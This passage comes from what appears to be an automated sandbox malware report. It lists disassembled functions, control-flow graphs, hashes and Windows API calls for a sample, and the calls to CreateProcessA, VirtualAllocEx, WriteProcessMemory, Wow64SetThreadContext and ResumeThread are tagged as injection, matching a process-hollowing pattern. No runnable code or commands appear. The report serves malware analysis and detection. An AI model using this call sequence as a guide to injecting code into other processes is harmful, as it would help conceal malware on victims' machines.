569->570 571 76b78c8 569->571 572 76b78e6-76b78ed 570->572 573 76b78d6-76b78dc 570->573 571->570 574 76b78ef-76b78fe 572->574 575 76b7904 572->575 573->572 574->575 577 76b7905 575->577 577->577
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B77F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: c6b99cd698d46b257fd75557192f3f17d35274b1341c387772753ed42238f1e9
                        • Instruction ID: 2a064900551b2a598ccd243383f0436a880e1a47a66a7603bca9961d987c4c30
                        • Opcode Fuzzy Hash: c6b99cd698d46b257fd75557192f3f17d35274b1341c387772753ed42238f1e9
                        • Instruction Fuzzy Hash: 38A13CB1D0021ADFDF24CF68C841BDEBBB2AF89314F1485AAD819A7240DB759985CF91
                        Function 076B75C0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 578 76b75c0-76b7655 580 76b768e-76b76ae 578->580 581 76b7657-76b7661 578->581 588 76b76b0-76b76ba 580->588 589 76b76e7-76b7716 580->589 581->580 582 76b7663-76b7665 581->582 583 76b7688-76b768b 582->583 584 76b7667-76b7671 582->584 583->580 586 76b7673 584->586 587 76b7675-76b7684 584->587 586->587 587->587 590 76b7686 587->590 588->589 591 76b76bc-76b76be 588->591 595 76b7718-76b7722 589->595 596 76b774f-76b7809 CreateProcessA 589->596 590->583 593 76b76e1-76b76e4 591->593 594 76b76c0-76b76ca 591->594 593->589 597 76b76ce-76b76dd 594->597 598 76b76cc 594->598 595->596 600 76b7724-76b7726 595->600 609 76b780b-76b7811 596->609 610 76b7812-76b7898 596->610 597->597 599 76b76df 597->599 598->597 599->593 601 76b7749-76b774c 600->601 602 76b7728-76b7732 600->602 601->596 604 76b7736-76b7745 602->604 605 76b7734 602->605 604->604 607 76b7747 604->607 605->604 607->601 609->610 620 76b789a-76b789e 610->620 621 76b78a8-76b78ac 610->621 620->621 622 76b78a0 620->622 623 76b78ae-76b78b2 621->623 624 76b78bc-76b78c0 621->624 622->621 623->624 625 76b78b4 623->625 626 76b78c2-76b78c6 624->626 627 76b78d0-76b78d4 624->627 625->624 626->627 628 76b78c8 626->628 629 76b78e6-76b78ed 627->629 630 76b78d6-76b78dc 627->630 628->627 631 76b78ef-76b78fe 629->631 632 76b7904 629->632 630->629 631->632 634 76b7905 632->634 634->634
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B77F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 1235d60a954a15dfc19da3a2b446c82c7360e82841e2ce02d9fde2e032cb280d
                        • Instruction ID: 7dba14df8349d08828a9690008ddfff3166deda37d65c35756a592b04330eb53
                        • Opcode Fuzzy Hash: 1235d60a954a15dfc19da3a2b446c82c7360e82841e2ce02d9fde2e032cb280d
                        • Instruction Fuzzy Hash: 7E913CB1D0021ADFDF24CF68CC41BDEBBB2AF89314F1485AAD819A7240DB749985CF91
                        Function 030DEF30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 635 30def30-30def3f 636 30def6b-30def6f 635->636 637 30def41-30def4e call 30dc478 635->637 639 30def71-30def7b 636->639 640 30def83-30defc4 636->640 644 30def64 637->644 645 30def50-30def5e call 30df1c8 637->645 639->640 646 30defc6-30defce 640->646 647 30defd1-30defdf 640->647 644->636 645->644 653 30df0a0-30df160 645->653 646->647 648 30defe1-30defe6 647->648 649 30df003-30df005 647->649 651 30defe8-30defef call 30de904 648->651 652 30deff1 648->652 654 30df008-30df00f 649->654 658 30deff3-30df001 651->658 652->658 686 30df168-30df193 GetModuleHandleW 653->686 687 30df162-30df165 653->687 655 30df01c-30df023 654->655 656 30df011-30df019 654->656 659 30df025-30df02d 655->659 660 30df030-30df039 call 30de914 655->660 656->655 658->654 659->660 666 30df03b-30df043 660->666 667 30df046-30df04b 660->667 666->667 668 30df04d-30df054 667->668 669 30df069-30df076 667->669 668->669 671 30df056-30df066 call 30de924 call 30de934 668->671 675 30df099-30df09f 669->675 676 30df078-30df096 669->676 671->669 676->675 688 30df19c-30df1b0 686->688 689 30df195-30df19b 686->689 687->686 689->688
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 030DF186
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 0fa3bbb742e67af73c6721245afd5debc444dc481498eec524f34520a754f2f8
                        • Instruction ID: 74dc2619595dd20254c9c7bebf76a1acc657d107262a828d145aba943a5fe9d3
                        • Opcode Fuzzy Hash: 0fa3bbb742e67af73c6721245afd5debc444dc481498eec524f34520a754f2f8
                        • Instruction Fuzzy Hash: DB714470A01B068FDB64DF2AD4447AABBF5FF88304F04892DD08ADBA50DB75E845CB91
                        Function 030D590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 810 30d590c-30d5913 811 30d5918-30d59d9 CreateActCtxA 810->811 813 30d59db-30d59e1 811->813 814 30d59e2-30d5a3c 811->814 813->814 821 30d5a3e-30d5a41 814->821 822 30d5a4b-30d5a4f 814->822 821->822 823 30d5a51-30d5a5d 822->823 824 30d5a60 822->824 823->824 826 30d5a61 824->826 826->826
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 030D59C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: b4a34b01acd466dfb44cc9d338bdbb56a358b3a3acbdc03140a6e405609c1321
                        • Instruction ID: 608ccc01ad1df392034bd664a1df8dabfcdbb540bb26172ee5759306c0ee54a5
                        • Opcode Fuzzy Hash: b4a34b01acd466dfb44cc9d338bdbb56a358b3a3acbdc03140a6e405609c1321
                        • Instruction Fuzzy Hash: B641CFB0C01729CADB24DFA9C984BCEBBF6BF49304F64805AD408AB251DBB56945CF90
                        Function 030D44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 827 30d44b4-30d59d9 CreateActCtxA 830 30d59db-30d59e1 827->830 831 30d59e2-30d5a3c 827->831 830->831 838 30d5a3e-30d5a41 831->838 839 30d5a4b-30d5a4f 831->839 838->839 840 30d5a51-30d5a5d 839->840 841 30d5a60 839->841 840->841 843 30d5a61 841->843 843->843
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 030D59C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 27e907c586e9d4542db030d2e61bb79e4cf55974d0fdce87e6f8365f6eadd6cc
                        • Instruction ID: 9ebcf6164898486eb833732e43bac7cec09c73f129370da7adbef37af2bdbcc4
                        • Opcode Fuzzy Hash: 27e907c586e9d4542db030d2e61bb79e4cf55974d0fdce87e6f8365f6eadd6cc
                        • Instruction Fuzzy Hash: 1E41D0B0C0172DCADB24DFA9C884BDEBBF6BF49304F64805AD409AB251DBB56945CF90
                        Function 076B7330 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 844 76b7330-76b7386 846 76b7388-76b7394 844->846 847 76b7396-76b73d5 WriteProcessMemory 844->847 846->847 849 76b73de-76b740e 847->849 850 76b73d7-76b73dd 847->850 850->849
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B73C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 51570b814a5398525c4819d28681d529551c77b0f99931087adcdf0923682e14
                        • Instruction ID: 94435aff2419d6c702aa537129a1335cca6d8954d997956881a7576c267d3a50
                        • Opcode Fuzzy Hash: 51570b814a5398525c4819d28681d529551c77b0f99931087adcdf0923682e14
                        • Instruction Fuzzy Hash: A12148B19003599FDB10CFA9D881BDEBBF5FF48320F10842AE919A7340C7789544DBA0
                        Function 076B7420 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 864 76b7420-76b74b5 ReadProcessMemory 868 76b74be-76b74ee 864->868 869 76b74b7-76b74bd 864->869 869->868
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B74A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 5e239d82f982940f78d205cabf4c3959c005600cbf0a44835588024b79fc0000
                        • Instruction ID: 67426e6262df75683babfed1d50d8bbe1ec703f06f7cec5f6ca742d8806d6611
                        • Opcode Fuzzy Hash: 5e239d82f982940f78d205cabf4c3959c005600cbf0a44835588024b79fc0000
                        • Instruction Fuzzy Hash: 8A214AB19003599FCB10DFAAD841AEEBBF5FF88320F10842AE519A7740C7799544DBA1
                        Function 076B7338 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 854 76b7338-76b7386 856 76b7388-76b7394 854->856 857 76b7396-76b73d5 WriteProcessMemory 854->857 856->857 859 76b73de-76b740e 857->859 860 76b73d7-76b73dd 857->860 860->859
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B73C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 6c20f980b689ee70dc9d6ff2edc3c6de47fc5b7a13c0322326b2883ab2f34379
                        • Instruction ID: 437d7979baecca6f1f8b23720af059b97a2ad3079cfd57b498a0d261ef1a82e8
                        • Opcode Fuzzy Hash: 6c20f980b689ee70dc9d6ff2edc3c6de47fc5b7a13c0322326b2883ab2f34379
                        • Instruction Fuzzy Hash: 86210AB19003599FDB10DFA9C985BDEBBF5FF48310F10842AE919A7340D7789544DBA4
                        Function 076B7199 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B721E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 4a18cdf4dfea3491162d329c2dacdf5dedc64103fd3320ec4b329cced534556c
                        • Instruction ID: 2373800a4dc8e953770aae61694be861f24ec6c701f1f9ba49e9e3c192ac1f0d
                        • Opcode Fuzzy Hash: 4a18cdf4dfea3491162d329c2dacdf5dedc64103fd3320ec4b329cced534556c
                        • Instruction Fuzzy Hash: 9C213AB19003098FDB20DFAAD4857EEBBF5EF88324F14842AD459A7340CB789545CFA1
                        Function 076B7428 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B74A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 346bb12183dc9505830ba0c6b5bc79db89377c696d898a9deb7a6659c893ab0b
                        • Instruction ID: f09b6cd072727872610e7ea870db6171d50193b802573077bd880fc1c0831eb5
                        • Opcode Fuzzy Hash: 346bb12183dc9505830ba0c6b5bc79db89377c696d898a9deb7a6659c893ab0b
                        • Instruction Fuzzy Hash: 6E2128B19003599FCB10DFAAC985ADEBBF5FF88320F10842AE519A7340C7799944DBA0
                        Function 076B71A0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B721E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: d9bd5fe81734b9e1783857d5934ad5e424be20a29180cb74028d3081fbbd05e1
                        • Instruction ID: cd82f4e2b3a98715bcddb4f01f21fa1762df00a476b9461a5607b856bc1e1c10
                        • Opcode Fuzzy Hash: d9bd5fe81734b9e1783857d5934ad5e424be20a29180cb74028d3081fbbd05e1
                        • Instruction Fuzzy Hash: 7F2138B19003098FDB20DFAAC485BEEBBF5EF88324F14842AD419A7340C7789944CFA0
                        Function 076B7271 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B72E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: deb5e68d6ee94bc6834739fb240a69b60368b28f4541490bf3aae675009bb324
                        • Instruction ID: fba29c4c44bbdab1ba99266e36311e26bb3689a774e736449edaf65ee73252f2
                        • Opcode Fuzzy Hash: deb5e68d6ee94bc6834739fb240a69b60368b28f4541490bf3aae675009bb324
                        • Instruction Fuzzy Hash: 54116AB2900249DFDB20DFAAC845ADEBFF5EF88320F20841AE519A7350C7759540DF90
                        Function 030DE960 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DF201,00000800,00000000,00000000), ref: 030DF412
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 6e10065bd0060bfe126fe0d7d44d7ec1dfe42fd18dce3759ba07f491064c643c
                        • Instruction ID: 38480f0fe81bd1a00caef61027b6673a839dcd9cfe26c0bdf131f118e3a7ae24
                        • Opcode Fuzzy Hash: 6e10065bd0060bfe126fe0d7d44d7ec1dfe42fd18dce3759ba07f491064c643c
                        • Instruction Fuzzy Hash: D31103B69013498FDB10CF9AD444ADEFBF5EF48310F14842AE419A7700C379A544CFA4
                        Function 076B7278 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B72E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 917628113fee4d5083c47f62af9994f24250e4e385b7b73003a1cdc94976cebd
                        • Instruction ID: 8eae8f411723dc8f31d8f496277d0ea3980e92ac617e657d47b5a22eb7fe351c
                        • Opcode Fuzzy Hash: 917628113fee4d5083c47f62af9994f24250e4e385b7b73003a1cdc94976cebd
                        • Instruction Fuzzy Hash: 191137B19002499FCB20DFAAC845ADFBFF5EF88320F24841AE519A7350C779A544DFA0
                        Function 076B70F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 5d768a86c82fea2f2d09849ea03298aad1d16cfdee1f1e6a6478f650ef57c30c
                        • Instruction ID: 22c48568c568db87d789fc2f2364ed61c3a6d7410e3a0ddfb90590307a429831
                        • Opcode Fuzzy Hash: 5d768a86c82fea2f2d09849ea03298aad1d16cfdee1f1e6a6478f650ef57c30c
                        • Instruction Fuzzy Hash: 861128B19003498BDB24DFAAC8457DEFBF9AF88324F24841AD519A7340C779A544CBA4
                        Function 030DF120 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 030DF186
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095838772.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_30d0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 81cd14f14fa065e8f4878a29ecfd2f2a41292753de5b84a86004d48520e10495
                        • Instruction ID: 6fe3cfae57744a3a6a56e58c81a68e84df7772136fd04fdfad647147109fb119
                        • Opcode Fuzzy Hash: 81cd14f14fa065e8f4878a29ecfd2f2a41292753de5b84a86004d48520e10495
                        • Instruction Fuzzy Hash: 1C11DFB5C0074A8FCB10DF9AD944A9EFBF9AF88324F24C41AD429A7610C379A545CFA5
                        Function 076B8168 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076BBA55
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 45a56891c0eac56d0b6ede573495446af3ab0cb9bce42b9b2d0c2a8effa4e237
                        • Instruction ID: c29ddbc20a64402770479935078d39ccc9d552b051e95653470427898f52400a
                        • Opcode Fuzzy Hash: 45a56891c0eac56d0b6ede573495446af3ab0cb9bce42b9b2d0c2a8effa4e237
                        • Instruction Fuzzy Hash: B21106B5800749DFDB20DF9AC885BDEBBF8EB49324F208419E519A7700C379A944CFA5
                        Function 076BB9F1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076BBA55
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_76b0000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: b215d9aa40dc13cd3b0d1d9fda433d75b258fa54d4dba909c6ba1b93842719f4
                        • Instruction ID: 00cc54dcefb21ddbfe8fdb2ef76c28b8fde3d36decec83181c675ecd86151e21
                        • Opcode Fuzzy Hash: b215d9aa40dc13cd3b0d1d9fda433d75b258fa54d4dba909c6ba1b93842719f4
                        • Instruction Fuzzy Hash: F91113B5800349DFCB20CF9AD885BDEBBF8EB48320F20840AD518A7600C379A584CFA5
                        Function 0169D528 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2094816027.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_169d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0d5c727779720799d4551e02dcb01067574dde95a71b8f043830ebb58610de91
                        • Instruction ID: f6b42a62634e131698c6ed75319e884abd893c8129eca62d30901d86363a2869
                        • Opcode Fuzzy Hash: 0d5c727779720799d4551e02dcb01067574dde95a71b8f043830ebb58610de91
                        • Instruction Fuzzy Hash: 362103B1504240EFDF05DF58D9C0B26BF69FB84328F24C579E90A0B256C336D456CBA1
                        Function 016AD01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095227811.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_16ad000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ef8c36ab8103d934e227ec97a085cd2611e2396beeb97a860c7cf683fe222f21
                        • Instruction ID: 8a4199ada3180536575bb465e676066978f7356bc7dfe9cde7de6aac33915b1c
                        • Opcode Fuzzy Hash: ef8c36ab8103d934e227ec97a085cd2611e2396beeb97a860c7cf683fe222f21
                        • Instruction Fuzzy Hash: A92122B1644200DFCB15DF68D9C0B26BBA5FB88354F60C96DE90A4B796C33AD847CE61
                        Function 016AD1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095227811.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_16ad000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12b6531d50984f52690fa0f9654320b8e562a5b10c0af1684aa79f3f24300de9
                        • Instruction ID: b008d69156f52c2d02290bd3da1ff148ff4fc3d8aff6bbe2bfa3fb704dc16a42
                        • Opcode Fuzzy Hash: 12b6531d50984f52690fa0f9654320b8e562a5b10c0af1684aa79f3f24300de9
                        • Instruction Fuzzy Hash: 7E2137B1504200EFDB05DF98C9C0B26BB65FB84324F60C56DEA0A4B752C336DC06CE61
                        Function 016AD006 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095227811.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_16ad000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7154d272400d08b9a0131957edbeaa3531afb5ac55b8a408ff470de24295ad18
                        • Instruction ID: def1106b67c604f4b2401b6897b63203541deba5b0b05aa5bfcc03d703c4ee6a
                        • Opcode Fuzzy Hash: 7154d272400d08b9a0131957edbeaa3531afb5ac55b8a408ff470de24295ad18
                        • Instruction Fuzzy Hash: 852180755483809FDB03CF54D994B11BF71EB46314F28C5DAD8498F6A7C33A984ACB62
                        Function 0169D523 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2094816027.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_169d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                        • Instruction ID: 82ea59a86c5502b2074087ff7499c32014ed6dcde09794127e48366c2cfba39f
                        • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                        • Instruction Fuzzy Hash: F911E172404280CFCF12CF54D9C0B16BF72FB84314F24C5AAD8090B656C33AD45ACBA1
                        Function 016AD1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2095227811.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_16ad000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction ID: 49e07ccc3e6cd1140e33afd075c107b9694d7eeafe835d325a018ce469f16aa9
                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                        • Instruction Fuzzy Hash: 0C11BB75504280DFDB12CF54C9C4B15BBA2FB84224F24C6AAD9494BBA6C33AD84ACF61
                        Function 0169D731 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2094816027.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_169d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b46a6be44c8df03d30ddc317af717a3c53c0cc53ec4ceef18e108d392bb9153d
                        • Instruction ID: 287cd6578f8251752bdcb8abc3cdf32f5271cdb9cc2dcfb9e739a45375044995
                        • Opcode Fuzzy Hash: b46a6be44c8df03d30ddc317af717a3c53c0cc53ec4ceef18e108d392bb9153d
                        • Instruction Fuzzy Hash: 3201A7715043849BEB104AA9CDC4B7ABFDCDF41364F18C52AED494E292D7789840C671
                        Function 0169D730 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2094816027.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_169d000_tfF3UBTdr8.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c4ae2c4bef3cf98b8e69fc8052845fe7356caf5c80e4accfbf0f59b10cfa5127
                        • Instruction ID: 5912337cf95ba7d7645875f6b3c8cb112ed83bcefcb85555bd8948651ed811e9
                        • Opcode Fuzzy Hash: c4ae2c4bef3cf98b8e69fc8052845fe7356caf5c80e4accfbf0f59b10cfa5127
                        • Instruction Fuzzy Hash: 08F062724043849BEB218A59DDC4B66FFDCEB91774F18C56AED484F382C3799844CA71

                        Non-executed Functions

                        Function 076BCD40 Relevance: .4, Instructions: 446COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102463432.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
